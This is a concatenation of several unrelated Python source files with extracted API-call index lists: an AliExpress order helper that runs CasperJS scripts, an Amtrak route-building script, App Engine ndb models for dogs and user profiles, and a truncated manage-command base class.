'readonly', justify='center')\n", (4553, 4641), False, 'from tkinter import ttk\n'), ((4850, 4950), 'tkinter.ttk.Combobox', 'ttk.Combobox', (['downloadFrame'], {'textvariable': 'self.downloadWhat', 'state': '"""readonly"""', 'justify': '"""center"""'}), "(downloadFrame, textvariable=self.downloadWhat, state=\n 'readonly', justify='center')\n", (4862, 4950), False, 'from tkinter import ttk\n'), ((5077, 5142), 'tkinter.ttk.Button', 'ttk.Button', (['downloadFrame'], {'text': '"""Download"""', 'command': 'self.download'}), "(downloadFrame, text='Download', command=self.download)\n", (5087, 5142), False, 'from tkinter import ttk\n'), ((6049, 6094), 'DetailsPage.DetailsPage', 'DetailsPage', (['self.master'], {'id': 'id', 'cur': 'self.cur'}), '(self.master, id=id, cur=self.cur)\n', (6060, 6094), False, 'from DetailsPage import DetailsPage\n'), ((8580, 8682), 'tkinter.simpledialog.askstring', 'simpledialog.askstring', ([], {'title': '"""Excel File Name"""', 'prompt': '"""Enter the name to save the excel file :"""'}), "(title='Excel File Name', prompt=\n 'Enter the name to save the excel file :')\n", (8602, 8682), False, 'from tkinter import simpledialog\n'), ((8802, 8817), 'xlwt.Workbook', 'xlwt.Workbook', ([], {}), '()\n', (8815, 8817), False, 'import xlwt\n'), ((8908, 9056), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;"""'], {}), "(\n 'font: bold 1, color blue; borders: left thick, right thin, top thin, bottom thin; pattern: pattern solid, fore_color white;'\n )\n", (8919, 9056), False, 'import xlwt\n'), ((9068, 9174), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thick, top thick, right thin, bottom thick'\n )\n", (9079, 9174), False, 'import xlwt\n'), ((9183, 9288), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; 
border: left thin, top thick, right thin, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thin, top thick, right thin, bottom thick'\n )\n", (9194, 9288), False, 'import xlwt\n'), ((9298, 9404), 'xlwt.easyxf', 'xlwt.easyxf', (['"""font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick"""'], {}), "(\n 'font: bold 1, color blue; border: left thin, top thick, right thick, bottom thick'\n )\n", (9309, 9404), False, 'import xlwt\n'), ((9413, 9457), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thick"""'], {}), "('border: left thin,right thick')\n", (9424, 9457), False, 'import xlwt\n'), ((9477, 9536), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin, right thick, bottom thick"""'], {}), "('border: left thin, right thick, bottom thick')\n", (9488, 9536), False, 'import xlwt\n'), ((9555, 9612), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thin, bottom thick"""'], {}), "('border: left thin,right thin, bottom thick')\n", (9566, 9612), False, 'import xlwt\n'), ((9632, 9691), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thick, right thin, bottom thick"""'], {}), "('border: left thick, right thin, bottom thick')\n", (9643, 9691), False, 'import xlwt\n'), ((9710, 9754), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thick,right thin"""'], {}), "('border: left thick,right thin')\n", (9721, 9754), False, 'import xlwt\n'), ((9773, 9816), 'xlwt.easyxf', 'xlwt.easyxf', (['"""border: left thin,right thin"""'], {}), "('border: left thin,right thin')\n", (9784, 9816), False, 'import xlwt\n'), ((8871, 8885), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (8883, 8885), False, 'from datetime import datetime\n')]
|
from core import run_casper,save_db,load_db
from datetime import datetime,timedelta
import logging
# module-level logger for the AliExpress integration
log = logging.getLogger('ali-module')
# CasperJS scripts executed through core.run_casper()
list_js="ali/get_order_list.js"
order_js="ali/get_order.js"
confirm_js="ali/confirm_order.js"
login_js="ali/login.js"
# order detail page template, filled in by get_order_link()
order_url="http://trade.aliexpress.com/order_detail.htm?orderId=%s"
def get_order_list(full=False):
    """Fetch the order list via CasperJS; full=True requests the complete list."""
    if full:
        return run_casper(list_js, ["full"])
    return run_casper(list_js)
def get_order(ident):
    """Fetch one order and normalize its protection reminder to a deadline.

    The raw result contains a relative countdown, e.g.::

        "payment-time": "2014-07-11 01:32:35",
        "protection-reminder": {
            "hours": 3,
            "days": 14,
            "seconds": 50,
            "minutes": 50
        },

    which is replaced by an absolute 'protection-timeout' timestamp.
    run_casper raises exception if get_order failed.

    Fix: the original captured ``now`` but then called ``datetime.now()``
    a second time when computing the deadline; the single captured value
    is used now so the reminder is applied to one consistent instant.
    """
    ret = run_casper(order_js, [ident])
    rem = ret['protection-reminder']
    if rem:
        now = datetime.now()
        # remaining buyer-protection time, as reported by the page
        prot_secs = rem["hours"] * 60 * 60 + rem["minutes"] * 60 + rem["seconds"]
        protection_timeout = timedelta(days=rem["days"], seconds=prot_secs)
        # store an absolute deadline instead of the relative countdown
        ret['protection-timeout'] = (now + protection_timeout).strftime("%Y-%m-%d %H:%M:%S")
        del ret['protection-reminder']
    ret['type'] = 'aliexpress'
    return ret
def get_order_link(ident):
    """Return the order-detail page URL for the given order id."""
    return order_url % ident
def confirm_order(ident):
    """Confirm receipt of an order, logging and re-raising any failure."""
    try:
        status = run_casper(confirm_js, [ident])
        log.info("confirm order status: %s" % status)
    except Exception as e:
        log.error("could not confirm order %s" % ident)
        log.error(e)
        raise
def login():
    """Run the CasperJS login script and return its result."""
    result = run_casper(login_js, [])
    return result
|
[
"datetime.timedelta",
"datetime.datetime.now",
"core.run_casper",
"logging.getLogger"
] |
[((106, 137), 'logging.getLogger', 'logging.getLogger', (['"""ali-module"""'], {}), "('ali-module')\n", (123, 137), False, 'import logging\n'), ((789, 818), 'core.run_casper', 'run_casper', (['order_js', '[ident]'], {}), '(order_js, [ident])\n', (799, 818), False, 'from core import run_casper, save_db, load_db\n'), ((1616, 1640), 'core.run_casper', 'run_casper', (['login_js', '[]'], {}), '(login_js, [])\n', (1626, 1640), False, 'from core import run_casper, save_db, load_db\n'), ((381, 400), 'core.run_casper', 'run_casper', (['list_js'], {}), '(list_js)\n', (391, 400), False, 'from core import run_casper, save_db, load_db\n'), ((425, 454), 'core.run_casper', 'run_casper', (['list_js', "['full']"], {}), "(list_js, ['full'])\n", (435, 454), False, 'from core import run_casper, save_db, load_db\n'), ((880, 894), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (892, 894), False, 'from datetime import datetime, timedelta\n'), ((1075, 1121), 'datetime.timedelta', 'timedelta', ([], {'days': "rem['days']", 'seconds': 'prot_secs'}), "(days=rem['days'], seconds=prot_secs)\n", (1084, 1121), False, 'from datetime import datetime, timedelta\n'), ((1443, 1474), 'core.run_casper', 'run_casper', (['confirm_js', '[ident]'], {}), '(confirm_js, [ident])\n', (1453, 1474), False, 'from core import run_casper, save_db, load_db\n'), ((1158, 1172), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1170, 1172), False, 'from datetime import datetime, timedelta\n')]
|
#Amtrak Recursive ROute Writer (ARROW)
#cont- does not write initial .npz file, relies on existing partials
def main(newdata=False,
         cont=False,
         newredund=False,
         arrive=True):
    """Search for candidate Amtrak routes between terminal-city pairs.

    Parses the FRA track geojson into per-segment endpoint arrays
    (cached in endpts.npz), then repeatedly extends partial routes on
    disk via route_builder.main until no partial files remain.

    Parameters:
        newdata   -- re-parse amtrak.geojson and rebuild endpts.npz
        cont      -- resume from existing partial .npz files instead of
                     seeding a fresh search from the starting city
        newredund -- recompute the redundant-segment list via find_redundancy
        arrive    -- forwarded unchanged to route_builder.main

    Refactor: the partial-route search loop was copy-pasted five times
    (once per named route); it now lives in the _search_route helper.
    """
    import json
    import numpy as np
    import os
    import route_builder
    import glob
    import find_redundancy
    local = 'F:/Python34/America_By_Train/'
    rb = local + 'route_builder/'
    direc = 'C:/Users/Owner/Documents/GitHub/capecchi.github.io/posts/AmericaByTrain/'

    def _search_route(route_name, start_pts, dest, block_idx):
        """Grow partial routes from start_pts toward dest.

        Marks the segments in block_idx as redundant (off-limits), seeds
        the search with start_pts unless resuming (cont), then keeps
        feeding the oldest partial file to route_builder.main -- which
        writes new, longer partials -- until none remain.
        """
        iredund = np.load(local + 'redundant.npy')
        # append element-wise: np.append(int_array, []) would silently
        # promote the index array to float, so keep the per-item loop
        for i in block_idx:
            iredund = np.append(iredund, i)
        iarr = np.array([], dtype=int)
        if not cont:
            np.savez(rb + 'partial', ptA=start_pts, iarr=iarr)
        partials = glob.glob(rb + '*.npz')
        while len(partials) > 0:
            level = 0
            with np.load(partials[0]) as f:
                ptA = f['ptA']
                iarr = f['iarr']
            os.remove(partials[0])
            route_builder.main(ptA, iarr, dest, rb + route_name, level,
                               iredund, arrive=arrive)
            partials = glob.glob(rb + '*.npz')

    if newdata or not os.path.isfile(local + 'endpts.npz'):
        with open(direc + 'amtrak.geojson') as f:
            data = json.load(f)
        feats = data['features']
        index = np.arange(len(feats))
        strt = []  # first coordinate of each track segment
        end = []   # last coordinate of each track segment
        for i in index:
            cc = feats[i]['geometry']['coordinates']
            strt.append(cc[0])
            end.append(cc[-1])
        # NEED route GPS endpoints to look for
        # FRAARCID of the segments touching each route's terminal city
        stpaulid = 182592  # keep east pt
        stpaul_iarr_cid = 182614  # mark eastern segment as redundant so we only search west
        portland_cid = 266301  # block southern route to Portland
        seattleid = 241310  # keep south pt
        laid = 211793  # keep south pt
        palmspringsid = 263261  # keep west pt
        neworleansid_end = 178659  # keep east pt NOTE does not connect to neworleans_start
        neworleansid_start = 243859  # keep south or east pt
        phillyid = 204870  # keep north pt
        dcid = 164103  # keep south pt
        chicagoid = 253079  # keep north pt
        # per-route segment indices that must be treated as redundant
        eb_block = np.array([], dtype=int)
        cs_block = np.array([], dtype=int)
        sl_block = np.array([], dtype=int)
        cr_block = np.array([], dtype=int)
        cl_block = np.array([], dtype=int)
        for i in index:
            cid = feats[i]['properties']['FRAARCID']
            coords = feats[i]['geometry']['coordinates']
            c1 = coords[0]
            c2 = coords[-1]
            if cid == stpaulid:
                stpaul = c1 if c1[0] > c2[0] else c2  # keep east pt
            if cid == stpaul_iarr_cid or cid == portland_cid:
                eb_block = np.append(eb_block, i)
            if cid == seattleid:
                seattle = c1 if c1[1] < c2[1] else c2  # keep south pt
            if cid == laid:
                la = c1 if c1[1] < c2[1] else c2  # keep south pt
            if cid in (seattleid, portland_cid, 189128, 244148, 254149):
                cs_block = np.append(cs_block, i)
            if cid == palmspringsid:
                palmsprings = c1 if c1[0] < c2[0] else c2  # keep west pt
            if cid == neworleansid_end:
                neworleans_end = c1 if c1[0] > c2[0] else c2  # keep east pt
            if cid in (263258, 266284, 178673):
                sl_block = np.append(sl_block, i)
            if cid == neworleansid_start:
                neworleans_start = c1 if c1[0] > c2[0] else c2
            if cid == phillyid:
                philly = c1 if c1[1] > c2[1] else c2  # keep north pt
            if cid in (243812, 204623, 169919, 169921,
                       125491, 164053, 275062, 261822):
                cr_block = np.append(cr_block, i)
            if cid == dcid:
                dc = c1 if c1[1] < c2[1] else c2  # keep south pt
            if cid == chicagoid:
                chicago = c1 if c1[1] > c2[1] else c2  # keep north pt
            if cid in (252822, 164114, 252939, 152297,
                       197933, 197961, 192650, 192649,
                       253070, 256677, 193489, 266257,
                       266676):
                cl_block = np.append(cl_block, i)
        cid = [feats[i]['properties']['FRAARCID'] for i in index]
        if newredund:
            # identify redundant track segments (find_redundancy persists
            # its result; start from an empty redundant.npy)
            iredund = np.array([], dtype=int)
            np.save(local + 'redundant', iredund)
            find_redundancy.main(index, strt, end, cid, local)
        # cache everything so later runs can skip the geojson parse
        np.savez(local + 'endpts', index=index, strt=strt, end=end, cid=cid,
                 stpaul=stpaul, seattle=seattle, la=la, palmsprings=palmsprings,
                 neworleans_end=neworleans_end, neworleans_start=neworleans_start,
                 philly=philly, dc=dc, chicago=chicago, eb_block=eb_block,
                 cs_block=cs_block, sl_block=sl_block, cr_block=cr_block,
                 cl_block=cl_block)
        print('saved endpts arrays and city GPS coords')
    else:
        f = np.load(local + 'endpts.npz')
        index = f['index']
        strt = f['strt']
        end = f['end']
        cid = f['cid']
        stpaul = f['stpaul']
        eb_block = f['eb_block']
        seattle = f['seattle']
        la = f['la']
        cs_block = f['cs_block']
        palmsprings = f['palmsprings']
        neworleans_end = f['neworleans_end']
        sl_block = f['sl_block']
        neworleans_start = f['neworleans_start']
        philly = f['philly']
        cr_block = f['cr_block']
        dc = f['dc']
        chicago = f['chicago']
        cl_block = f['cl_block']

    # Manual toggles: flip an `if 0` to `if 1` to run that route search.
    if 1:  # EMPIRE BUILDER
        print('finding EMPIRE BUILDER routes')
        # eb_block is intentionally NOT appended here (it was commented
        # out in the original); the cached redundant list already
        # constrains the search westward.
        _search_route('empire_builder', [stpaul], seattle, [])
    if 0:  # COAST STARLIGHT
        print('finding COAST STARLIGHT routes')
        _search_route('coast_starlight', [seattle], la, cs_block)
    if 0:  # SUNSET LIMITED
        print('finding SUNSET LIMITED routes')
        _search_route('sunset_limited', [palmsprings], neworleans_end, sl_block)
    if 0:  # CRESCENT
        print('finding CRESCENT routes')
        _search_route('crescent', [neworleans_start], philly, cr_block)
    if 0:  # CAPITOL LIMITED
        print('finding CAPITOL LIMITED routes')
        _search_route('capitol_limited', [dc], chicago, cl_block)
|
[
"numpy.load",
"json.load",
"numpy.save",
"os.remove",
"numpy.append",
"os.path.isfile",
"numpy.array",
"glob.glob",
"find_redundancy.main",
"numpy.savez",
"route_builder.main"
] |
[((1579, 1602), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1587, 1602), True, 'import numpy as np\n'), ((1621, 1644), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1629, 1644), True, 'import numpy as np\n'), ((1663, 1686), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1671, 1686), True, 'import numpy as np\n'), ((1705, 1728), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1713, 1728), True, 'import numpy as np\n'), ((1747, 1770), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (1755, 1770), True, 'import numpy as np\n'), ((4384, 4734), 'numpy.savez', 'np.savez', (["(local + 'endpts')"], {'index': 'index', 'strt': 'strt', 'end': 'end', 'cid': 'cid', 'stpaul': 'stpaul', 'seattle': 'seattle', 'la': 'la', 'palmsprings': 'palmsprings', 'neworleans_end': 'neworleans_end', 'neworleans_start': 'neworleans_start', 'philly': 'philly', 'dc': 'dc', 'chicago': 'chicago', 'eb_block': 'eb_block', 'cs_block': 'cs_block', 'sl_block': 'sl_block', 'cr_block': 'cr_block', 'cl_block': 'cl_block'}), "(local + 'endpts', index=index, strt=strt, end=end, cid=cid, stpaul\n =stpaul, seattle=seattle, la=la, palmsprings=palmsprings,\n neworleans_end=neworleans_end, neworleans_start=neworleans_start,\n philly=philly, dc=dc, chicago=chicago, eb_block=eb_block, cs_block=\n cs_block, sl_block=sl_block, cr_block=cr_block, cl_block=cl_block)\n", (4392, 4734), True, 'import numpy as np\n'), ((4847, 4876), 'numpy.load', 'np.load', (["(local + 'endpts.npz')"], {}), "(local + 'endpts.npz')\n", (4854, 4876), True, 'import numpy as np\n'), ((5552, 5584), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (5559, 5584), True, 'import numpy as np\n'), ((5657, 5680), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (5665, 5680), True, 'import numpy as np\n'), ((5761, 5784), 'glob.glob', 
'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (5770, 5784), False, 'import glob\n'), ((6295, 6327), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (6302, 6327), True, 'import numpy as np\n'), ((6411, 6434), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (6419, 6434), True, 'import numpy as np\n'), ((6515, 6538), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6524, 6538), False, 'import glob\n'), ((7060, 7092), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (7067, 7092), True, 'import numpy as np\n'), ((7176, 7199), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (7184, 7199), True, 'import numpy as np\n'), ((7280, 7303), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (7289, 7303), False, 'import glob\n'), ((7809, 7841), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (7816, 7841), True, 'import numpy as np\n'), ((7925, 7948), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (7933, 7948), True, 'import numpy as np\n'), ((8029, 8052), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8038, 8052), False, 'import glob\n'), ((8520, 8552), 'numpy.load', 'np.load', (["(local + 'redundant.npy')"], {}), "(local + 'redundant.npy')\n", (8527, 8552), True, 'import numpy as np\n'), ((8636, 8659), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (8644, 8659), True, 'import numpy as np\n'), ((8740, 8763), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8749, 8763), False, 'import glob\n'), ((511, 547), 'os.path.isfile', 'os.path.isfile', (["(local + 'endpts.npz')"], {}), "(local + 'endpts.npz')\n", (525, 547), False, 'import os\n'), ((615, 627), 'json.load', 'json.load', (['f'], {}), '(f)\n', (624, 627), False, 'import 
json\n'), ((4201, 4224), 'numpy.array', 'np.array', (['[]'], {'dtype': 'int'}), '([], dtype=int)\n', (4209, 4224), True, 'import numpy as np\n'), ((4236, 4273), 'numpy.save', 'np.save', (["(local + 'redundant')", 'iredund'], {}), "(local + 'redundant', iredund)\n", (4243, 4273), True, 'import numpy as np\n'), ((4295, 4350), 'find_redundancy.main', 'find_redundancy.main', (['index', 'strt', 'end', 'fraarcid', 'local'], {}), '(index, strt, end, fraarcid, local)\n', (4315, 4350), False, 'import find_redundancy\n'), ((5701, 5745), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (5709, 5745), True, 'import numpy as np\n'), ((5958, 5980), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (5967, 5980), False, 'import os\n'), ((5993, 6089), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'seattle', "(rb + 'empire_builder')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, seattle, rb + 'empire_builder', level,\n iredund, arrive=arrive)\n", (6011, 6089), False, 'import route_builder\n'), ((6134, 6157), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6143, 6157), False, 'import glob\n'), ((6375, 6396), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (6384, 6396), True, 'import numpy as np\n'), ((6455, 6499), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (6463, 6499), True, 'import numpy as np\n'), ((6712, 6734), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (6721, 6734), False, 'import os\n'), ((6747, 6840), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'coast_starlight')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'coast_starlight', level, iredund,\n arrive=arrive)\n", (6765, 6840), False, 'import route_builder\n'), ((6885, 6908), 'glob.glob', 'glob.glob', 
(["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (6894, 6908), False, 'import glob\n'), ((7140, 7161), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (7149, 7161), True, 'import numpy as np\n'), ((7220, 7264), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (7228, 7264), True, 'import numpy as np\n'), ((7477, 7499), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (7486, 7499), False, 'import os\n'), ((7512, 7604), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'sunset_limited')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'sunset_limited', level, iredund,\n arrive=arrive)\n", (7530, 7604), False, 'import route_builder\n'), ((7649, 7672), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (7658, 7672), False, 'import glob\n'), ((7889, 7910), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (7898, 7910), True, 'import numpy as np\n'), ((7969, 8013), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 'partial', ptA=ptA, iarr=iarr)\n", (7977, 8013), True, 'import numpy as np\n'), ((8226, 8248), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (8235, 8248), False, 'import os\n'), ((8261, 8348), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'crescent')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'crescent', level, iredund, arrive=\n arrive)\n", (8279, 8348), False, 'import route_builder\n'), ((8359, 8382), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (8368, 8382), False, 'import glob\n'), ((8600, 8621), 'numpy.append', 'np.append', (['iredund', 'i'], {}), '(iredund, i)\n', (8609, 8621), True, 'import numpy as np\n'), ((8680, 8724), 'numpy.savez', 'np.savez', (["(rb + 'partial')"], {'ptA': 'ptA', 'iarr': 'iarr'}), "(rb + 
'partial', ptA=ptA, iarr=iarr)\n", (8688, 8724), True, 'import numpy as np\n'), ((8937, 8959), 'os.remove', 'os.remove', (['partials[0]'], {}), '(partials[0])\n', (8946, 8959), False, 'import os\n'), ((8972, 9065), 'route_builder.main', 'route_builder.main', (['ptA', 'iarr', 'ptB', "(rb + 'capitol_limited')", 'level', 'iredund'], {'arrive': 'arrive'}), "(ptA, iarr, ptB, rb + 'capitol_limited', level, iredund,\n arrive=arrive)\n", (8990, 9065), False, 'import route_builder\n'), ((9110, 9133), 'glob.glob', 'glob.glob', (["(rb + '*.npz')"], {}), "(rb + '*.npz')\n", (9119, 9133), False, 'import glob\n'), ((2169, 2191), 'numpy.append', 'np.append', (['eb_block', 'i'], {}), '(eb_block, i)\n', (2178, 2191), True, 'import numpy as np\n'), ((2556, 2578), 'numpy.append', 'np.append', (['cs_block', 'i'], {}), '(cs_block, i)\n', (2565, 2578), True, 'import numpy as np\n'), ((2932, 2954), 'numpy.append', 'np.append', (['sl_block', 'i'], {}), '(sl_block, i)\n', (2941, 2954), True, 'import numpy as np\n'), ((3400, 3422), 'numpy.append', 'np.append', (['cr_block', 'i'], {}), '(cr_block, i)\n', (3409, 3422), True, 'import numpy as np\n'), ((3946, 3968), 'numpy.append', 'np.append', (['cl_block', 'i'], {}), '(cl_block, i)\n', (3955, 3968), True, 'import numpy as np\n'), ((5855, 5875), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (5862, 5875), True, 'import numpy as np\n'), ((6609, 6629), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (6616, 6629), True, 'import numpy as np\n'), ((7374, 7394), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (7381, 7394), True, 'import numpy as np\n'), ((8123, 8143), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (8130, 8143), True, 'import numpy as np\n'), ((8834, 8854), 'numpy.load', 'np.load', (['partials[0]'], {}), '(partials[0])\n', (8841, 8854), True, 'import numpy as np\n')]
|
from google.appengine.ext import ndb
class Dog(ndb.Model):
    """Datastore entity for a dog profile (referenced by UserProfile.dogs)."""
    name = ndb.StringProperty()
    breed = ndb.StringProperty()
    gender = ndb.StringProperty()
    age = ndb.StringProperty()  # stored as free-form text, not a number
    size = ndb.StringProperty()
    socialLevel = ndb.StringProperty()
    activityLevel = ndb.StringProperty()
    profilePic = ndb.BlobProperty()  # raw bytes; presumably an image -- confirm
    ownerEmail = ndb.StringProperty()
class UserProfile(ndb.Model):
    """Datastore entity for an app user and the dogs they own."""
    name = ndb.StringProperty()
    email = ndb.StringProperty()
    dogs = ndb.KeyProperty(Dog, repeated=True)  # keys of this user's Dog entities
    city = ndb.StringProperty()
    state = ndb.StringProperty()
    age = ndb.IntegerProperty()
    sex = ndb.StringProperty(choices=["Female", "Male", "Prefer not to say"])
    profilePic = ndb.BlobProperty()  # raw bytes; presumably an image -- confirm
|
[
"google.appengine.ext.ndb.BlobProperty",
"google.appengine.ext.ndb.IntegerProperty",
"google.appengine.ext.ndb.StringProperty",
"google.appengine.ext.ndb.KeyProperty"
] |
[((71, 91), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (89, 91), False, 'from google.appengine.ext import ndb\n'), ((104, 124), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (122, 124), False, 'from google.appengine.ext import ndb\n'), ((138, 158), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (156, 158), False, 'from google.appengine.ext import ndb\n'), ((169, 189), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (187, 189), False, 'from google.appengine.ext import ndb\n'), ((201, 221), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (219, 221), False, 'from google.appengine.ext import ndb\n'), ((240, 260), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (258, 260), False, 'from google.appengine.ext import ndb\n'), ((281, 301), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (299, 301), False, 'from google.appengine.ext import ndb\n'), ((319, 337), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ([], {}), '()\n', (335, 337), False, 'from google.appengine.ext import ndb\n'), ((355, 375), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (373, 375), False, 'from google.appengine.ext import ndb\n'), ((418, 438), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (436, 438), False, 'from google.appengine.ext import ndb\n'), ((451, 471), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (469, 471), False, 'from google.appengine.ext import ndb\n'), ((483, 518), 'google.appengine.ext.ndb.KeyProperty', 'ndb.KeyProperty', (['Dog'], {'repeated': '(True)'}), '(Dog, repeated=True)\n', (498, 518), False, 'from google.appengine.ext import ndb\n'), ((530, 550), 'google.appengine.ext.ndb.StringProperty', 
'ndb.StringProperty', ([], {}), '()\n', (548, 550), False, 'from google.appengine.ext import ndb\n'), ((563, 583), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {}), '()\n', (581, 583), False, 'from google.appengine.ext import ndb\n'), ((594, 615), 'google.appengine.ext.ndb.IntegerProperty', 'ndb.IntegerProperty', ([], {}), '()\n', (613, 615), False, 'from google.appengine.ext import ndb\n'), ((626, 693), 'google.appengine.ext.ndb.StringProperty', 'ndb.StringProperty', ([], {'choices': "['Female', 'Male', 'Prefer not to say']"}), "(choices=['Female', 'Male', 'Prefer not to say'])\n", (644, 693), False, 'from google.appengine.ext import ndb\n'), ((711, 729), 'google.appengine.ext.ndb.BlobProperty', 'ndb.BlobProperty', ([], {}), '()\n', (727, 729), False, 'from google.appengine.ext import ndb\n')]
|
import argparse
import inspect
import logging
import logging.config
import os
import pkgutil
import sys
from aiokts.managecommands import Command
from aiokts.store import Store
CURRENT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(CURRENT_DIR)
class BaseManage(object):
    """Base class for a ``manage.py``-style command-line tool.

    Subclasses must set :attr:`commands_package_path` to the directory
    (relative to the subclass's module) that contains one module per
    command. Each command module either exposes a module-level
    ``main(*args)`` function or defines a ``Command`` subclass.
    """

    #: Path to the package containing command modules (set by subclasses)
    commands_package_path = None
    #: Store class made available to commands (aiokts Store)
    store_cls = Store
    # Class-level defaults only; per-instance copies are created in
    # __init__ so separate manager instances don't share mutable state.
    _modules = {}
    _commands = None

    def __init__(self):
        self._logger = None
        # Per-instance containers (see note on the class attributes above).
        self._modules = {}
        self._commands = None
        assert self.commands_package_path is not None, \
            'Must specify path to where commands are'
        # Resolve the commands path relative to the *subclass's* file so
        # the tool works no matter the current working directory.
        self.commands_package_path = os.path.abspath(
            os.path.join(
                os.path.dirname(inspect.getfile(self.__class__)),
                self.commands_package_path))
        self.logger.debug('Commands path: %s', self.commands_package_path)

    @property
    def commands(self):
        """List of available command names, discovered lazily.

        Always includes the built-in ``help`` command; every non-package
        module found in ``commands_package_path`` is added as a command.
        """
        if self._commands is None:
            self._commands = ['help']
            for loader, name, ispkg in \
                    pkgutil.iter_modules([self.commands_package_path]):
                if not ispkg:
                    self._commands.append(name)
